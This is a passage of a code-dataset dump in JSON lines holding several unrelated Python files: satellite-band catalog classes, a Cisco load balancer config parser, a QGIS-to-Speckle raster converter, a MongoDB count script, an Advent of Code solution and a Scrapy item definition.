`MicrowaveBand`: A band that lies in the microwave spectrum, often from SAR or\n passive radar sensors. Specific attributes: :attr:`~MicrowaveBand.frequency`,\n :attr:`~MicrowaveBand.bandwidth`\n * `MaskBand`: A binary band where by convention a 0 means masked and 1 means\n non-masked. The :attr:`~Band.data_range` and :attr:`~Band.display_range` for\n masks is implicitly ``[0, 1]``.\n * `ClassBand`: A band that maps a finite set of values that may not be continuous to\n classification categories (e.g. a land use classification). A visualization with\n straight pixel values is typically not useful, so commonly a\n :attr:`~ClassBand.colormap` is used. Specific attributes:\n :attr:`~ClassBand.colormap`, :attr:`~ClassBand.colormap_name`,\n :attr:`~ClassBand.class_labels`\n * `GenericBand`: A generic type for bands that are not represented by the other band\n types, e.g., mapping physical values like temperature or angles. Specific\n attributes: :attr:`~GenericBand.colormap`, :attr:`~GenericBand.colormap_name`,\n :attr:`~GenericBand.physical_range`, :attr:`~GenericBand.physical_range_unit`\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n **The attributes documented below are shared by all band objects,\n namely SpectralBand, MicrowaveBand, MaskBand, ClassBand, and GenericBand.**\n\n Attributes\n ----------\n description : str\n A description with further details on the band\n type : str, BandType\n The type of this band, directly corresponding to a `Band` subclass\n (:py:class:`SpectralBand`, :py:class:`MicrowaveBand`, :py:class:`MaskBand`,\n :py:class:`ClassBand`, :py:class:`GenericBand`). Never needs to be set\n explicitly, this attribute is implied by the subclass used. The type of a\n band does not necessarily affect how it is rastered, it mainly conveys\n useful information about the data it contains.\n *Filterable*.\n sort_order : int\n A number defining the default sort order for bands within a product. If not\n set for newly created bands, this will default to the current maximum sort\n order + 1 in the product.\n *Sortable*.\n data_type : DataType\n Required: The data type for pixel values in this band\n nodata : float\n A value representing missing data in a pixel in this band\n data_range : tuple(float, float)\n Required: The minimum and maximum pixel values stored in this band\n display_range : tuple(float, float)\n Required: A reasonable default range of pixel values when rastering\n this band for display purposes\n resolution : Resolution\n The spatial resolution of this band.\n *Filterable, sortable*.\n band_index : int\n Required: The 0-based index into the source data to access this band\n file_index : int\n The 0-based index into the list of source files, if there are multiple ones.\n Defaults to 0 (first file).\n jpx_layer_index : int\n The 0-based layer index if the source data is JPEG2000 with layers.\n Defaults to 0.\n \"\"\"\n\n _doc_type = \"band\"\n _url = \"/bands\"\n _derived_type_switch = \"type\"\n _default_includes = [\"product\"]\n\n description = Attribute()\n type = EnumAttribute(BandType)\n sort_order = Attribute()\n data_type = EnumAttribute(DataType)\n nodata = Attribute()\n data_range = Attribute()\n display_range = Attribute()\n resolution = Resolution()\n band_index = Attribute()\n file_index = Attribute()\n jpx_layer_index = Attribute()\n\n def __new__(cls, *args, **kwargs):\n if cls is Band:\n raise TypeError(\n \"Please instantiate one of the derived classes of 'Band' instead\"\n )\n\n return super(Band, cls).__new__(cls)\n\n def __init__(self, **kwargs):\n if self._derived_type_switch not in kwargs:\n kwargs[self._derived_type_switch] = self._derived_type\n\n super(Band, self).__init__(**kwargs)\n\n @classmethod\n def search(cls, client=None):\n \"\"\"A search query for all bands.\n\n Returns an instance of the\n :py:class:`~descarteslabs.catalog.search.Search` class configured for\n searching bands. Call this on the :py:class:`Band` base class to search all\n types of bands or classes :py:class:`SpectralBand`, :py:class:`MicrowaveBand`,\n :py:class:`MaskBand`, :py:class:`ClassBand` and :py:class:`GenericBand` to search\n only a specific type of band.\n\n\n Parameters\n ----------\n client : :py:class:`CatalogClient`\n A `CatalogClient` instance to use for requests to the Descartes Labs\n catalog.\n\n Returns\n -------\n :py:class:`~descarteslabs.catalog.search.Search`\n An instance of the :py:class:`~descarteslabs.catalog.search.Search` class\n \"\"\"\n search = super(Band, cls).search(client)\n if cls._derived_type:\n search = search.filter(properties.type == cls._derived_type)\n return search\n\n\nclass SpectralBand(Band):\n \"\"\"A band that lies somewhere on the visible/NIR/SWIR electro-optical wavelength\n spectrum.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n wavelength_nm_center : float\n Weighted center of min/max responsiveness of the band, in nm.\n *Filterable, sortable*.\n wavelength_nm_min : float\n Minimum wavelength this band is sensitive to, in nm.\n *Filterable, sortable*.\n wavelength_nm_max : float\n Maximum wavelength this band is sensitive to, in nm.\n *Filterable, sortable*.\n wavelength_nm_fwhm : float\n Full width at half maximum value of the wavelength spread, in nm.\n *Filterable, sortable*.\n \"\"\"\n\n _derived_type = BandType.SPECTRAL.value\n\n wavelength_nm_center = Attribute()\n wavelength_nm_min = Attribute()\n wavelength_nm_max = Attribute()\n wavelength_nm_fwhm = Attribute()\n\n\nclass MicrowaveBand(Band):\n \"\"\"A band that lies in the microwave spectrum, often from SAR or passive radar sensors.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n frequency : float\n Center frequency of the observed microwave in GHz.\n *Filterable, sortable*.\n bandwidth : float\n Chirp bandwidth of the sensor in MHz.\n *Filterable, sortable*.\n \"\"\"\n\n _derived_type = BandType.MICROWAVE.value\n\n frequency = Attribute()\n bandwidth = Attribute()\n\n\nclass MaskBand(Band):\n \"\"\"A binary band where by convention a 0 means masked and 1 means non-masked.\n\n The :py:attr:`data_range` and :py:attr:`display_range` for masks is implicitly\n ``(0, 1)``.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), and\n the computed attributes (`data_range`, `display_range`) any (inherited)\n attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n data_range : tuple(float, float)\n Readonly: [0, 1].\n display_range : tuple(float, float)\n Readonly: [0, 1].\n \"\"\"\n\n _derived_type = BandType.MASK.value\n\n\nclass ClassBand(Band):\n \"\"\"A band that maps a finite set of values that may not be continuous.\n\n For example land use classification. A visualization with straight pixel values\n is typically not useful, so commonly a colormap is used.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n colormap_name : str\n Name of a predefined colormap for display purposes.\n colormap : list(tuple)\n A custom colormap for this band. A list of lists, where each nested list\n is a 4-tuple of RGBA values to map pixels whose value is the index of the\n tuple. E.g. the colormap ``[[100, 20, 200, 255]]`` would map pixels\n whose value is 0 in the original band to the RGBA color defined by\n ``[100, 20, 200, 255]``. The number of 4-tuples provided can be up\n to the maximum of this band's data range. Omitted values will map to black\n by default.\n class_labels : list(str or None)\n A list of labels where each element is a name for the class with the value at\n that index. Elements can be null if there is no label at that value.\n \"\"\"\n\n _derived_type = BandType.CLASS.value\n\n colormap_name = Attribute()\n colormap = Attribute()\n class_labels = Attribute()\n\n\nclass GenericBand(Band):\n \"\"\"A generic kind of band not fitting any other type.\n\n For example mapping physical values like temperature or angles.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n physical_range : tuple(float, float)\n A physical range that pixel values map to\n physical_range_unit : str\n Unit of the physical range\n colormap_name : str\n Name of a predefined colormap for display purposes\n colormap : list(tuple)\n A custom colormap for this band. A list of lists, where each nested list\n is a 4-tuple of RGBA values to map pixels whose value is the index of the\n tuple. E.g. the colormap ``[[100, 20, 200, 255]]`` would map pixels\n whose value is 0 in the original band to the RGBA color defined by\n ``[100, 20, 200, 255]``. The number of 4-tuples provided can be up\n to the maximum of this band's data range. Omitted values will map to black\n by default.\n \"\"\"\n\n _derived_type = BandType.GENERIC.value\n\n physical_range = Attribute()\n physical_range_unit = Attribute()\n colormap_name = Attribute()\n colormap = Attribute()\n\n\nclass DerivedBand(CatalogObject):\n \"\"\"\n A type of band that is the result of a pixel function applied to one or more\n existing bands. This object type only supports read operations;\n they cannot be created, updated, or deleted using this client.\n\n Parameters\n ----------\n kwargs : dict\n This is a readonly object.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base class:\n\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n name : str\n Required, immutable: The name of the derived band, globally unique.\n *Filterable, sortable*.\n description : str\n Immutable: A description with further details on the derived band\n data_type : str\n Required, immutable: The data type for pixel values in this derived band\n data_range : tuple(float, float)\n Required, immutable: The minimum and maximum pixel values stored in\n this derived band\n physical_range : tuple(float, float)\n Immutable: A physical range that pixel values map to\n bands : list(str)\n Required, immutable: List of bands used in the derived band pixel function\n *Filterable*\n function_name : str\n Required, immutable: Name of the function applied to create this derived band\n\n Methods\n -------\n delete(ignore_missing=False)\n You cannot delete a derived band.\n\n Raises\n ------\n NotImplementedError\n This method is not supported for DerivedBands.\n\n \"\"\"\n\n _doc_type = \"derived_band\"\n _url = \"/derived_bands\"\n\n name = Attribute()\n description = Attribute()\n data_type = EnumAttribute(DataType)\n data_range = Attribute()\n physical_range = Attribute()\n bands = Attribute()\n function_name = Attribute()\n\n def save(self):\n \"\"\"You cannot save a derived band.\n\n Raises\n ------\n NotImplementedError\n This method is not supported for DerivedBands.\n \"\"\"\n raise NotImplementedError(\"Saving and updating DerivedBands is not permitted\")\n\n @classmethod\n def delete(cls, id, client=None, ignore_missing=False):\n \"\"\"You cannot delete a derived band.\n\n Raises\n ------\n NotImplementedError\n This method is not supported for DerivedBands.\n \"\"\"\n raise NotImplementedError(\"Deleting DerivedBands is not permitted\")\n\n def _instance_delete(self, ignore_missing=False):\n raise NotImplementedError(\"Deleting DerivedBands is not permitted\")\n","sub_path":"descarteslabs/catalog/band.py","file_name":"band.py","file_ext":"py","file_size_in_byte":18049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97360735","text":"# coding: utf-8\n#==============================================================================\n#\n# Limited error checking, no optimisation, blunt force approach\n# to get basic information extracted from load balancer configuration\n# Searching based on a particular configuration style\n# \n# python loadbalancer.py loadbalancer IP port\n# assumes 'loadbalancer.txt' is in same path/directory\n#\n#==============================================================================\n\nimport sys\nimport re\n\nfrom ciscoconfparse import CiscoConfParse\n\ndevice = sys.argv[1]+'.txt'\nparse = CiscoConfParse(device)\n\n\ndef prConf(config_string):\n\n for x in range(len(config_string)):\n print(config_string[x])\n\n\ndef VIP_local(VIP_IP, VIP_TCP, VIP_Protocol, last_VIP):\n\n sticky_all = []\n sticky_timeout = ''\n\n class_map = parse.find_parents_w_child('^class-map', VIP_IP + VIP_Protocol + VIP_TCP + '$')\n transition = re.split(r'\\s+', class_map[0])\n class_map_name = transition[-1]\n class_map_all = parse.find_all_children(class_map[0])\n\n policy_map_class = parse.find_parents_w_child('class ' + class_map_name, 'loadbalance policy')\n policy_map_class_all = parse.find_children('class ' + class_map_name)\n if policy_map_class == []:\n return\n policy_map_class_policy = parse.find_children_w_parents('^' + policy_map_class[0], '\\s+loadbalance policy')\n transition = re.split(r'\\s+', policy_map_class_policy[0])\n policy_map_name = transition[-1]\n policy_map_all = parse.find_all_children('match ' + policy_map_name)\n\n nat = parse.find_children_w_parents('^'+policy_map_class[0], '\\s+nat dynamic')\n if nat != []:\n transition = re.split(r'\\s+', nat[0])\n nat = parse.find_lines('nat-pool ' + transition[3])\n nat_interface = parse.find_parents_w_child('interface ', 'nat-pool ' + transition[3])\n\n policy_map = parse.find_lines('policy-map type loadbalance first-match ' + policy_map_name)\n serverfarm_ = parse.find_children_w_parents('^' + policy_map[0], 'serverfarm ')\n transition = re.split(r'\\s+', serverfarm_[-1])\n serverfarm_name = transition[-1]\n\n if parse.find_lines('farm .* ' + serverfarm_name):\n sticky_name = ''\n serverfarm_all = parse.find_all_children('farm .* ' + serverfarm_name)\n elif not parse.find_lines('farm .* ' + serverfarm_name):\n sticky_name = serverfarm_name\n sticky_all = parse.find_all_children('^sticky .*' + sticky_name + '$')\n serverfarm_name = parse.find_children_w_parents(sticky_name + '$', ' serverfarm')\n if serverfarm_name != []:\n transition = re.split(r'\\s+', serverfarm_name[-1])\n serverfarm_name = transition[-1]\n serverfarm_all = parse.find_all_children('farm .* ' + serverfarm_name)\n sticky_timeout = parse.find_children_w_parents(sticky_name + '$', '\\s+timeout ')\n if sticky_timeout != [] :\n transition = re.split(r'\\s+', sticky_timeout[-1])\n sticky_timeout = transition[-1]\n else:\n serverfarm_name = 'none'\n serverfarm_all = []\n\n if last_VIP != class_map_name:\n print(' ')\n print('------------------------------------------------------------')\n print('---- ' + class_map_name)\n print('------------------------------------------------------------')\n print(' ')\n\n transition = parse.find_children_w_parents('host ' + serverfarm_name + '$', '\\sprobe\\s')\n # the next line removes duplicates\n probes = list(set(transition))\n if last_VIP != class_map_name:\n for probe in probes:\n transition = re.split(r'\\s+', probe)\n probe_name = transition[2]\n probe_all = parse.find_all_children('^probe .* ' + probe_name + '$')\n prConf(probe_all)\n print(' ')\n\n for rserver in parse.find_children_w_parents('farm .* ' + serverfarm_name + '$', ' rserver '):\n transition = re.split(r'\\s+', rserver)\n rserver_name = transition[2]\n rserver_all = parse.find_all_children('rserver .* ' + rserver_name)\n prConf(rserver_all)\n\n if last_VIP != class_map_name:\n print(' ')\n prConf(serverfarm_all)\n print(' ')\n prConf(sticky_all)\n if sticky_all:\n print(' ')\n prConf(class_map_all)\n print(' ')\n prConf(policy_map_all)\n print(' ')\n print('policy-map multi-match LB-HTTP-POLICY')\n prConf(policy_map_class_all)\n if nat != []:\n print(' ')\n prConf(nat_interface)\n prConf(nat)\n print(' ')\n\n return class_map_name\n\n\ndef main():\n\n #============================================================\n # python loadbalancer.py loadbalancer IP PORT\n # assumes 'loadbalancer.txt' is in same path/directory\n #============================================================\n\n last_VIP = ''\n\n x_IP = sys.argv[2]\n x_TCP = sys.argv[3]\n\n for x in parse.find_lines(r'virtual-address'):\n transition = re.split(r'\\s+', x)\n t_IP = transition[4]\n t_TCP = transition[-1]\n t_Protocol = transition[5]\n\n if x_IP == t_IP:\n if x_TCP == t_TCP:\n if t_Protocol == t_TCP:\n x_Protocol = ' '\n else:\n x_Protocol = ' ' + transition[5] + ' ' + transition[6] + ' '\n last_VIP = VIP_local(x_IP, x_TCP, x_Protocol, last_VIP)\n#\n#==========================================================================\n#\nif __name__ == '__main__':\n main()\n#\n#==========================================================================\n","sub_path":"farms.py","file_name":"farms.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271127409","text":"from distutils.log import error\nfrom qgis._core import QgsCoordinateTransform, Qgis, QgsPointXY, QgsGeometry, QgsRasterBandStats, QgsFeature, QgsFields, \\\n QgsField\nfrom specklepy.objects import Base\n\nfrom speckle.converter import geometry\nfrom speckle.converter.geometry import convertToSpeckle, transform\nfrom speckle.converter.geometry.mesh import rasterToMesh\nfrom speckle.logging import logger\nfrom osgeo import ( # # C:\\Program Files\\QGIS 3.20.2\\apps\\Python39\\Lib\\site-packages\\osgeo\n gdal, osr)\n\ndef featureToSpeckle(fieldnames, f, sourceCRS, targetCRS, project, selectedLayer):\n b = Base()\n\n #apply transformation if needed\n if sourceCRS != targetCRS:\n xform = QgsCoordinateTransform(sourceCRS, targetCRS, project)\n geometry = f.geometry()\n geometry.transform(xform)\n f.setGeometry(geometry)\n\n # Try to extract geometry\n try:\n geom = convertToSpeckle(f, selectedLayer)\n #print(geom)\n if geom is not None:\n b[\"geometry\"] = geom\n except Exception as error:\n logger.logToUser(\"Error converting geometry: \" + str(error), Qgis.Critical)\n\n for name in fieldnames:\n corrected = name.replace(\"/\", \"_\").replace(\".\", \"-\")\n if corrected == \"id\":\n corrected == \"applicationId\"\n b[corrected] = str(f[name])\n return b\n\n\ndef rasterFeatureToSpeckle(selectedLayer, projectCRS, project):\n rasterBandCount = selectedLayer.bandCount()\n rasterBandNames = []\n rasterDimensions = [selectedLayer.width(), selectedLayer.height()]\n if rasterDimensions[0]*rasterDimensions[1] > 1000000 :\n logger.logToUser(\"Large layer: \", Qgis.Warning)\n\n ds = gdal.Open(selectedLayer.source(), gdal.GA_ReadOnly)\n rasterOriginPoint = QgsPointXY(ds.GetGeoTransform()[0], ds.GetGeoTransform()[3])\n rasterResXY = [ds.GetGeoTransform()[1],ds.GetGeoTransform()[5]]\n rasterBandNoDataVal = []\n rasterBandMinVal = []\n rasterBandMaxVal = []\n rasterBandVals = []\n\n b = Base()\n # Try to extract geometry\n reprojectedPt = QgsGeometry.fromPointXY(QgsPointXY())\n try:\n reprojectedPt = rasterOriginPoint\n if selectedLayer.crs()!= projectCRS: reprojectedPt = transform.transform(rasterOriginPoint, selectedLayer.crs(), projectCRS)\n pt = QgsGeometry.fromPointXY(reprojectedPt)\n geom = convertToSpeckle(pt, selectedLayer)\n if (geom != None):\n b['displayValue'] = [geom]\n except Exception as error:\n logger.logToUser(\"Error converting point geometry: \" + str(error), Qgis.Critical)\n\n for index in range(rasterBandCount):\n rasterBandNames.append(selectedLayer.bandName(index+1))\n rb = ds.GetRasterBand(index+1)\n valMin = selectedLayer.dataProvider().bandStatistics(index+1, QgsRasterBandStats.All).minimumValue\n valMax = selectedLayer.dataProvider().bandStatistics(index+1, QgsRasterBandStats.All).maximumValue\n bandVals = rb.ReadAsArray().tolist()\n\n '''\n ## reduce resolution if needed: \n if totalValues>max_values : \n bandVals_resized = [] #list of lists\n factor = 1 #recalculate factor to reach max size\n for i in range(1,20):\n if totalValues/(i*i) <= max_values:\n factor = i\n break\n for item in bandVals: #reduce each row and each column\n bandVals_resized = [bandVals]\n '''\n bandValsFlat = []\n [bandValsFlat.extend(item) for item in bandVals]\n #look at mesh chunking\n b[\"@(10000)\" + selectedLayer.bandName(index+1) + \"_values\"] = bandValsFlat #[0:int(max_values/rasterBandCount)]\n rasterBandVals.append(bandValsFlat)\n rasterBandNoDataVal.append(rb.GetNoDataValue())\n rasterBandMinVal.append(valMin)\n rasterBandMaxVal.append(valMax)\n\n b[\"X resolution\"] = rasterResXY[0]\n b[\"Y resolution\"] = rasterResXY[1]\n b[\"X pixels\"] = rasterDimensions[0]\n b[\"Y pixels\"] = rasterDimensions[1]\n b[\"Band count\"] = rasterBandCount\n b[\"Band names\"] = rasterBandNames\n\n # creating a mesh\n vertices = []\n faces = []\n colors = []\n count = 0\n rendererType = selectedLayer.renderer().type()\n #print(rendererType)\n # TODO identify symbology type and if Multiband, which band is which color\n for v in range(rasterDimensions[1] ): #each row, Y\n for h in range(rasterDimensions[0] ): #item in a row, X\n pt1 = QgsPointXY(rasterOriginPoint.x()+h*rasterResXY[0], rasterOriginPoint.y()+v*rasterResXY[1])\n pt2 = QgsPointXY(rasterOriginPoint.x()+h*rasterResXY[0], rasterOriginPoint.y()+(v+1)*rasterResXY[1])\n pt3 = QgsPointXY(rasterOriginPoint.x()+(h+1)*rasterResXY[0], rasterOriginPoint.y()+(v+1)*rasterResXY[1])\n pt4 = QgsPointXY(rasterOriginPoint.x()+(h+1)*rasterResXY[0], rasterOriginPoint.y()+v*rasterResXY[1])\n # first, get point coordinates with correct position and resolution, then reproject each:\n if selectedLayer.crs()!= projectCRS:\n pt1 = transform.transform(src = pt1, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n pt2 = transform.transform(src = pt2, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n pt3 = transform.transform(src = pt3, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n pt4 = transform.transform(src = pt4, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n vertices.extend([pt1.x(), pt1.y(), 0, pt2.x(), pt2.y(), 0, pt3.x(), pt3.y(), 0, pt4.x(), pt4.y(), 0]) ## add 4 points\n faces.extend([4, count, count+1, count+2, count+3])\n\n # color vertices according to QGIS renderer\n color = (0<<16) + (0<<8) + 0\n noValColor = selectedLayer.renderer().nodataColor().getRgb()\n\n if rendererType == \"multibandcolor\":\n redBand = selectedLayer.renderer().redBand()\n greenBand = selectedLayer.renderer().greenBand()\n blueBand = selectedLayer.renderer().blueBand()\n rVal = 0\n gVal = 0\n bVal = 0\n for k in range(rasterBandCount):\n #### REMAP band values to (0,255) range\n valRange = (rasterBandMaxVal[k] - rasterBandMinVal[k])\n colorVal = int( (rasterBandVals[k][int(count/4)] - rasterBandMinVal[k]) / valRange * 255 )\n if k+1 == redBand: rVal = colorVal\n if k+1 == greenBand: gVal = colorVal\n if k+1 == blueBand: bVal = colorVal\n color = (rVal<<16) + (gVal<<8) + bVal\n # for missing values (check by 1st band)\n if rasterBandVals[0][int(count/4)] != rasterBandVals[0][int(count/4)]:\n color = (noValColor[0]<<16) + (noValColor[1]<<8) + noValColor[2]\n\n elif rendererType == \"paletted\":\n bandIndex = selectedLayer.renderer().band()-1 #int\n value = rasterBandVals[bandIndex][int(count/4)] #find in the list and match with color\n\n rendererClasses = selectedLayer.renderer().classes()\n for c in range(len(rendererClasses)-1):\n if value >= rendererClasses[c].value and value <= rendererClasses[c+1].value :\n rgb = rendererClasses[c].color.getRgb()\n color = (rgb[0]<<16) + (rgb[1]<<8) + rgb[2]\n break\n\n elif rendererType == \"singlebandpseudocolor\":\n bandIndex = selectedLayer.renderer().band()-1 #int\n value = rasterBandVals[bandIndex][int(count/4)] #find in the list and match with color\n\n rendererClasses = selectedLayer.renderer().legendSymbologyItems()\n for c in range(len(rendererClasses)-1):\n if value >= float(rendererClasses[c][0]) and value <= float(rendererClasses[c+1][0]) :\n rgb = rendererClasses[c][1].getRgb()\n color = (rgb[0]<<16) + (rgb[1]<<8) + rgb[2]\n break\n\n else:\n if rendererType == \"singlebandgray\":\n bandIndex = selectedLayer.renderer().grayBand()-1\n if rendererType == \"hillshade\":\n bandIndex = selectedLayer.renderer().band()-1\n if rendererType == \"contour\":\n try: bandIndex = selectedLayer.renderer().inputBand()-1\n except:\n try: bandIndex = selectedLayer.renderer().band()-1\n except: bandIndex = 0\n else: # e.g. single band data\n bandIndex = 0\n # REMAP band values to (0,255) range\n valRange = (rasterBandMaxVal[bandIndex] - rasterBandMinVal[bandIndex])\n colorVal = int( (rasterBandVals[bandIndex][int(count/4)] - rasterBandMinVal[bandIndex]) / valRange * 255 )\n color = (colorVal<<16) + (colorVal<<8) + colorVal\n\n colors.extend([color,color,color,color])\n count += 4\n\n mesh = rasterToMesh(vertices, faces, colors)\n if(b['displayValue'] is None):\n b['displayValue'] = []\n b['displayValue'].append(mesh)\n return b\n\n\ndef featureToNative(feature: Base):\n feat = QgsFeature()\n try: # ignore 'broken' geometry\n speckle_geom = feature[\"geometry\"]\n if isinstance(speckle_geom, list):\n qgsGeom = geometry.convertToNativeMulti(speckle_geom)\n else:\n qgsGeom = geometry.convertToNative(speckle_geom)\n\n if qgsGeom is not None:\n feat.setGeometry(qgsGeom)\n dynamicProps = feature.get_dynamic_member_names()\n dynamicProps.remove(\"geometry\")\n fields = QgsFields()\n for name in dynamicProps:\n try:\n fields.append(QgsField(name))\n except:\n print(error)\n feat.setFields(fields)\n for prop in dynamicProps:\n feat.setAttribute(prop, feature[prop])\n return feat\n except:\n return \"\"","sub_path":"speckle/converter/layers/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":10106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599766262","text":"import os,sys\nimport string\nfrom optparse import OptionParser\nimport glob\nimport json\nfrom bson import json_util\nimport pymongo\nfrom pymongo import MongoClient\nimport datetime\n\n\n__version__=\"1.0\"\n__status__ = \"Dev\"\n\n\n\n###############################\ndef main():\n\n\n usage = \"\\n%prog [options]\"\n parser = OptionParser(usage,version=\"%prog version___\")\n parser.add_option(\"-s\",\"--server\",action=\"store\",dest=\"server\",help=\"dev/tst/beta/prd\")\n parser.add_option(\"-c\",\"--coll\",action=\"store\",dest=\"coll\",help=\"\") \n (options,args) = parser.parse_args()\n\n for key in ([options.server, options.coll]):\n if not (key):\n parser.print_help()\n sys.exit(0)\n\n server = options.server\n coll = options.coll\n\n config_obj = json.loads(open(\"./conf/config.json\", \"r\").read())\n mongo_port = config_obj[\"dbinfo\"][\"port\"][server]\n mongo_container = \"running_glygen_mongo_%s\" % (server)\n\n host = \"mongodb://127.0.0.1:%s\" % (mongo_port)\n \n db_obj = config_obj[\"dbinfo\"][\"glydb\"]\n db_name, db_user, db_pass = db_obj[\"db\"], db_obj[\"user\"], db_obj[\"password\"]\n\n try:\n client = pymongo.MongoClient(host,\n username=db_user,\n password=db_pass,\n authSource=db_name,\n authMechanism='SCRAM-SHA-1',\n serverSelectionTimeoutMS=10000\n )\n client.server_info()\n dbh = client[db_name]\n n = dbh[coll].count_documents({})\n print (coll, n)\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print (err)\n except pymongo.errors.OperationFailure as err:\n print (err)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dump_count.py","file_name":"dump_count.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"544717030","text":"import Readfile as rf\nfrom dateutil import parser\nfrom collections import defaultdict\n\ndef caldulate(data):\n guards = defaultdict(list)\n times = defaultdict(int)\n\n for k in sorted(data):\n time, action = k.split('] ')\n time = parser.parse(time[1:])\n\n if action.startswith('Guard'):\n guard = int(action.split()[1][1:])\n elif action == 'falls asleep':\n start = time\n elif action == 'wakes up':\n end = time\n guards[guard].append((start.minute, end.minute))\n times[guard] += (end-start).seconds\n return guards, times\n\n\ndef part1(data):\n guards, times = caldulate(data)\n (guard, time) = max(times.items(), key=lambda i: i[1])\n (minute, count) = max([(minute, sum(1 for start, end in guards[guard] if start <= minute < end)) for minute in range(60)], key=lambda i: i[1])\n return minute * guard\n\n\ndef part2(data):\n guards, times = caldulate(data)\n (guard, minute, count) = max([\n (guard, minute, sum(1 for start, end in guards[guard] if start <= minute < end))\n for minute in range(60) for guard in guards], key=lambda i: i[0])\n return guard * minute\n\n\nif __name__ == '__main__':\n data = rf.read_file('InputFour')\n print(part1(data))\n print(part2(data))\n","sub_path":"AdventOfCode18/Day4/DayFour.py","file_name":"DayFour.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"575308066","text":"import scrapy\nimport re\n\nfrom scrapy.loader.processors import MapCompose, Join, TakeFirst\n\nfilter_list = [\n 'https://',\n 'http://',\n 'www.'\n]\n\n\ndef filter_strip(v):\n for a in filter_list:\n if a in v:\n return ''\n return v.strip()\n\n\ndef filter_pic(v):\n return None if not v else v\n\n\ndef filter_date(v):\n return [re.sub(r'(\\d+)\\.(\\d+)\\.(\\d+) \\((\\d+):(\\d+):(\\d+)\\)', r'\\1-\\2-\\3 \\4:\\5:\\6', a)\n for a in re.findall(r'\\d+\\.\\d+\\.\\d+ \\(\\d+:\\d+:\\d+\\)', v)]\n\n\nclass RetrieverCrawlerItem(scrapy.Item):\n r_id = scrapy.Field()\n media = scrapy.Field()\n title = scrapy.Field(\n input_processor=MapCompose(filter_strip),\n output_processor=TakeFirst()\n ) # 제목\n writer = scrapy.Field(\n input_processor=MapCompose(filter_strip),\n output_processor=TakeFirst()\n ) # 작성자\n category = scrapy.Field(\n output_processor=Join()\n ) # 게시판 분류\n content = scrapy.Field(\n input_processor=MapCompose(filter_strip),\n output_processor=Join()\n ) # 내용\n date = scrapy.Field(\n input_processor=MapCompose(filter_date),\n output_processor=TakeFirst()\n ) # 날짜\n url = scrapy.Field(\n 